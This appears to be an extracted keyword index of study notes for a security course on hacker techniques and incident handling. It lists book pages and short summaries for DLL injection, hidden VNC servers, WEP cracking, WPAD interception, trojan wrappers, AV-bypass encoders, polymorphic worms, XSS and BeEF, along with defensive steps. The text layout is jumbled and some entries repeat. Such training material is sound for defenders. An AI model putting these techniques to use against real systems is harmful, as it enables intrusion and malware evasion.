--ARIN (American Registry for Internet Numbers)
--RIPE NCC (Reseaux IP European Network Coordination Centre)
Whois: Research IP --APNIC (Asia Pacific Network Information Center)
2 20
Blocks --LACNIC (Latin American and Caribbean NIC)
--AFRINIC (Africa's NIC)
--DoDNIC (Department of Defense NIC)

After getting registration information and attacker may also want to see if any IP address blocks are assigned to the target.
Many organizations dont have their own IP address allocation; they get them from their ISPs
Whois: Sample 2 21 see screenshot
TCPView: map listening TCP/UDP ports
Windows - Additional Process Explorer and Process Monitor: process-analysis tools
1 76
Supporting Tools Hardening Guides: Center for Internet Security templates and scoring tools
 Keywords Book Page Remarks
Windows Cheat Sheet 1 63
Winsacheatsheet_2.0.pdf is the latest version. It applies to Windows XP pro up to Windows10. Older machines use v1.4
Windows Delimiter 2 attacks windows boxes. Instead of using forward slash / like the REF requires an attacker could use a backslash\
EXEs and DLLs are commonly used methods for packaging code in Windows
Windows User-Mode --EXEs run, and utilize shared DLLs to get stuff done
Rootkit: DLL Injection 5 51 On Windows, anyone with the Debug right can inject a DLL into a running process and start it running by creating a thread
and API Hooking in the target process
Hook APIs to change programs' views of running processes, open ports, and the file system
winrtgen.exe 4 27 A tool used for Cain that allows the attacker to generate the Rainbow tables
For Cain, the attacker can generate the Rainbow tables

Server can run in two modes:

WinVNC 5 13 --App mode (shows up in tool tray)
--Service mode (shows up in the service list and in tool tray after reboot)
--There is a config option to hide the tool tray icon

Preparation:
--MAC address filtering at the access point isnt secure
Set SSID so that it doesn’t attract attention
Use WPA2 with a strong password
--Recommended 21 characters long
Protect client wireless configs
72, 73, 74, Use layer 3 encryption to bolster of even supplat Layer 2 encryption
Wireless Defense 2
75 --Use VPN
--All data from end system to VPN gateway inside wireless device encrypted and authenticated
Be careful with wireless VPN config
Identification:
--Wireless IDS Tools are starting to get some traction
--Aruba Networks, Motoral AirDefense, AirMagnet, and others offer products
Cont, Erad, Recov:
--Remove renegade access points

Many wireless access points (base stations) are configured with no security
Wireless --Blank or default SSIDs are common
Misconfigurations: War 2 60 By default, most access points broadcast beacon packets with their SSID 10 times per second
Driving Even those APs configured not to include the SSID in beacons (SSID cloaking), SSIDs are still sent in clear text whenever
anyone used the wireless LAN

Utilize a traditional sniffer, gathering wireless packets

- Tcpdump, Wire Shark, and more
Wireless Sniffing 2 64 Or use a wireless-specific sniffer for better analysis of wireless-specific frame data
--Omnipeek (Commercial)
Aircrack ng and WEPCrack crack WEP keys
ASLEAP by Josh Wright provides a dictionary attack against LEAP
Wireshark 3 46 Powerful Multipurpose Protocol Analyzer
 Keywords Book Page Remarks
Third Party tools not required, integrated tools can pull from across net
C:\> wmic product get name, version
WMIC (Enterprise-Wide C:\> wmic /node:@systems.txt product get
1 137 -description, name, vendor, /format:csv > SoftwareInventory.txt
IR)
**csv or xml format

You could also use WordWebBugs to track the attacker

-These documents call back (preferably to a non-attributable system) so you can identify where you sensitive data is
WordWebBugs 1 106 -They are built into the Active Defense Harbinger Distribution

Preparation:
--Buffer overflow defenses help a lot here:
----Patches, non-executable system stacks, and host based IPS
--A process for rapidly testing and deploying patches when available
--Use application whitelisting or Software Restriction Policies/Applocker
Worm and Bots: --Encrypt data on hard drive
4 75 Identification:
Defenses
--Antivirus solutions updated regularly
Containment:
--Incident response capabilities, linked with network management
--May need to cut off segments of your network in real time
Eradication/Recovery:
--Use AV tool to remove infestation, if possible, or rebuild

Patch, app whitelisting, encryption, AV

-implement layered monitoring systems
Worm History 4 56 SQL Slammer, Blaster, Stuxnet, Conflicker…..etc (view slide)
Worms automate the process of compromising systems:
Worms 4 55 --Take over one system, scan/spread to new system
Each instance if a worm is a "segment"

-Each segment of the worm has the same function

-code base changes, detecting and isolating the worm difficult
-Detection and filtering signatures no longer match as the worm morphs

Worms - Polymorphic 4 63-64 Method described on pg 64

Solid polymorphic code engine is available:

-Viruses have been polymorphic for years
-HD Moore's XOR payloads and encoders (www.metaspolit.com)
-Veil has multiple AV bypass encoders
 Keywords Book Page Remarks

August 2001, two methods to increase initial infection

Worhol worm and Flash Worm
--Mathematical models, not code
Worms: Fast 4 61 --Warhol: 99% infection rate in 15 minutes
--Flash: 99% infection rate in 30 seconds
--A bit overstated..it'll take approximately 1 hour
Technique used by Carna Botnet
**Prescan for vuln hosts, preload targets

new techniques to maximize the speed at which worms spread.

Worhol worm and Flash Worm
--Mathematical models, not code
Worms: Fast Spreading 4 61 --Warhol: 99% infection rate in 15 minutes
--Flash: 99% infection rate in 30 seconds
--A bit overstated..it'll take approximately 1 hour
**Prescan for vuln hosts, preload targets
Beyond changing their appearance, these worms will change their entire functionality
Will contain encrypted/obfuscated payloads
Worms: Metamorphic 4 66 After event occurs (time duration, infection rate, or other trigger), the worm morphs by decoding the hidden functionality

Worms: Multi-Exploit 4 58 Worms becoming more complex, use several exploits at once
If you've patched against N-1 vulnerabilities, the worm will still get in through the hole N

Worms so far have done an excellent job of evading detection:

--Alter subject line to assist in spam filter evasion
Polymorphism (Dynamically changing):
--Each segment of the worm has the same function
--code base changes, detecting and isolating the worm difficult
Worms: Polymorphic 4 63 --Detection and filtering signatures no longer match as the worm morphs

Method described on pg 64

Solid polymorphic code engine is available:

--Viruses have been polymorphic for years
--HD Moore's XOR payloads and encoders (www.metaspolit.com)
--Veil has multiple AV bypass encoders
4 60 Worms that utilize brand new exploits that no patches are available for. Stuxnet provided an example of zero-day exploits in
Worms: Zero-Day Exploit
worms.

Where a system automatically attempts to find a system with a name of WPAD and download a PAC file with Proxy
settings.
WPAD: Attacking 3 74 --MitMf and Responder
Intercept traffic for specific domains (think PAC Backdoors) and harvest full HTTPS URL information for things like Session
IDs
Pacdoor us a tool that attacks WPAD
 Keywords Book Page Remarks

Warp a backdoor tool around some other application, AKA binders

Create aTrojan Horse executable
Wrappers 5 18 Built into many backdoors (Poison Ivy), Metasploit msvenom
Can wrap into .VBS or .VBA for macros in Word and Excel with exe2vba.rb and exe2vbs.rb
The Veil toolkit uses some of these techniques to bypass AV
SET's default payload generation also does theis
wtmp file 5 84 wtmp: File contains data about past user logins
-Default location on Linux /var/log/wtmp
xinetd 2 105 *nix service initialization script
XOR 3 128 reference
Xplico 3 55 Is a outstanding tool for pulling data out of network traffic and presenting it in such a way that it is easy to review
XSS 4 106 Cross-Site Scripting enables an attacker to steal information(such as cookies) from users of a vulnerable website. XSS is
based on web applications that reflect user input back to a user
Trick user into clicking a link with scripts embedded
XSS 4 104 - 109 --The script is sent to the webpage as part of user input
--when the user is sent to the page, the script is "reflected" back to the user
-script runs on client, executing your evil plans
Many applications have an admin console accessed using a browser that typically log all kinds of things such as -
XSS - Exploit Admin Date and timestamp, User account, Transaction type and details, User agent string(browser type), and packet logs
4 114
Apps --the script is input and stored in the log
-when the admin reviews the logs, the script is run on his host
XSS (Launching Attacks) 4 107 Attacker's script must be sent to the victim. URL embedded in an e-mail or newsgroup posting. URL provided on a 3rd party
website(either clicked by victim user or auto loaded when visiting a malicious website)
XSS (Overview) 4 108 Attacker intends to obtain sensitive data from victim user. Attacker searches target site to find CGI. Attacker writes a URL
with specialized browser script. Browser script steals cookie.
XSS (Reflected)
4 110
Walkthrough view Diagram. It's called "reflected" because the script is reflected off the target website back into the user's browser
XSS (Stored) view Diagram. It's called "stored" because the script is stored on the target website's backend and delivered back to the
4 111
Walkthrough user's browser.
XSS via Other How to send scripts? HTTP/HTTPS via web app, E-mail, FTP, U.S. Postal Service, Mag Stripe, Electronic Data Interchange
4 116
Mechanisms (EDI)? X.25? SS7?
0) Victim uses a website that sets cookies on the victim's browser
XSS Walkthrough (XSS 1) Victim clicks a URL or visits a website that includes the malicious script
4 109 2) Victim user's browser transmits malicious code to the vulnerable target site as a web request
works in 5 steps)
3) Target site reflects the malicious code back to the victim user's browser in the response to the request
4) Malicious code executes within victim user's browser under the security context of the target site

XSS: Access to Internal Using an XSS variant, the attacker could start scanning or otherwise attacking the internal network
4 112 -Users browers can reflect the code back into the network using the user's access to scan, exploit, etc.
Systems
Jikto: performs a Nikto scan of internal websites using XSS
Web logs that store user input can be used to attack admin systems.
XSS: Admin Apps 4 114 --the script is input and stored in the log
-when the admin reviews the logs, the script is run on his host

XSS: Attacking Admins 4 115 view Diagram. The application gathers input from a user and stores it the log for administrator to view. Admin
periodically views the stored content and the attacker inserts evil content and attack admins.
 Keywords Book Page Remarks

Uses an XSS hook to take interactive control of a victim browser

-Port Scanner
XSS: BeEF 4 113 -Visited URLs (history grabber)
-Software inventory
Alter current web page view in browser (deface page)
-Deliver Metasploit exploit to another target

Preparation:
--Disable scripting or use browser features to selectively control scripts.
Identification:
--IDS and/or logs showing user input w/ embedded scripts. Watch for encoded info(hex,unicode,etc)
XSS: Client Defenses 4 118, 119 Containment:
--Add a filter to incoming data,
Eradication:
--Remove attacker's data and transaction,
Recovery:
--Contact antifraud group

Filter user input, remove unneeded characters

--You must filter on the server side, your application must filter out: Quotes,Semicolons,Other shell/script metacharacters
XSS: Defenses 4 117 --You cannot do this filtering using JavaScript on the client because the attacked can get around such filtering
--Define characters that are ok (alpha and numeric), and filter everything else out; a white list approach
Modsecurity for Apache, IIS and Nginx includes such filtering capabilities
Use IDS and/or logs showing user input with embedded scripts
Zap 4 82 ZAP: Web app vuln scanner

ZAP is a feature rich web app manipulation proxy

Tracks website hierarchy
Supports client-side SSL Certs
Supports chained proxies
ZAP Features 4 140 Includes a web spider
Built in hash/encoding tool
Find and filter features
Automated SQL Injection and XSS detection mechanisms
Automatically scan sites passively
Customizable unsafe content detection
Zenmap Network Map Zenmap GUI can provide an interactive graphical portrayal of the network.
2 85
Output Output shows topology, cumulative views of recent scans, supports changing focus. Zooming and fisheye view
Zero-Day Exploit: Worms 4 60 Worms that utilize brand new exploits that no patches are available for. Stuxnet provided an example of zero-day exploits in
worms.